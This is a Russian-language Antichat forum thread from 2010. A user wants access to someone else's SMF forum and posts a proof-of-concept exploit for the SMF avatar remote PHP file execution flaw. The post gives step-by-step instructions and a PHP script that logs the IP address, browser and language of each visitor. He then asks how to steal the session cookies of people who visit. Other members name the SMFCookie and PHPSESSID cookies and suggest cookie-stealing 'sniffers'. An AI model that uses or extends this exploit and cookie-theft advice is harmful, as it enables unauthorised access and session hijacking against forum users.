ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Получить куки на SMF 1.1.18
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Получить куки на SMF 1.1.18
  #1  
Старый 20.04.2010, 19:34
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию Получить куки на SMF 1.1.18
Значит нужен доступ к одному форуму , версия форума 1.1.18 .
Нашел под форум exploit :

Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC

- Step by Step:

1) go to your profile in section of avatar.
2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
3) create a new topic.

- [victims] All the people that visit the topic will be infect.


malicious file example [steal info]: (poc.php)


PHP код:
<?php   $ip $_SERVER['REMOTE_ADDR'];   $so$_SERVER['HTTP_USER_AGENT'];   $lan$_SERVER['HTTP_ACCEPT_LANGUAGE'];   $url$_SERVER['PHP_SELF'];   $path$_SERVER['DOCUMENT_ROOT'];   $archivo 'hacks.txt';   $fp fopen($archivo"a");   $string "   Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC       $path$url     VICTIM: $ip     info: $so   language: $lan       ";   $write fputs($fp$string);   fclose($fp);   ?>
Делаю все как указанно выше , на моем хосте в файл hacks.txt пишется Ип , Время , Дата и sysinfo . Возможно ли с помощью этого exploita тянуть куки зашедших в топик ???
 
Ответить с цитированием

  #2  
Старый 20.04.2010, 19:49
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
уп )) стил нид хелп .
 
Ответить с цитированием

  #3  
Старый 20.04.2010, 20:09
Godfather Bulan
Постоянный
Регистрация: 18.03.2008
Сообщений: 411
Провел на форуме:
7469280

Репутация: 2389
Отправить сообщение для Godfather Bulan с помощью ICQ
По умолчанию
ну так посмотри переменную PHPSESSID например или как там в SMF
 
Ответить с цитированием

  #4  
Старый 20.04.2010, 21:34
Chubakur
Познающий
Регистрация: 06.04.2009
Сообщений: 69
Провел на форуме:
1032476

Репутация: 39
Отправить сообщение для Chubakur с помощью ICQ
По умолчанию
SMFCookie и PHPSESSID посмотри.
 
Ответить с цитированием

  #5  
Старый 20.04.2010, 21:38
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
Вплане SMFCookie и PHPSESSID посмотри ?? Можно немного поподробней ?? Я с куками 1 раз дело имею !!
 
Ответить с цитированием

  #6  
Старый 21.04.2010, 01:08
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
Провел на форуме:
1555641

Репутация: 8
По умолчанию
Народ , помогите нубику ))
 
Ответить с цитированием

  #7  
Старый 21.04.2010, 01:16
Godfather Bulan
Постоянный
Регистрация: 18.03.2008
Сообщений: 411
Провел на форуме:
7469280

Репутация: 2389
Отправить сообщение для Godfather Bulan с помощью ICQ
По умолчанию
ну посмотри в сторону снифаков
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Phpbb2 0.16 можно ли через куки получить доступ к админке? HAMANN Форумы 3 20.11.2006 01:25
Аудит аутентификации на Web-сайтах. Часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:20
Как можно получить куки ? VARVAR E-Mail 9 07.06.2005 02:22
Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки? virgoz Форумы 2 02.01.2005 22:08
Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров? Sky Форумы 3 04.11.2004 15:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ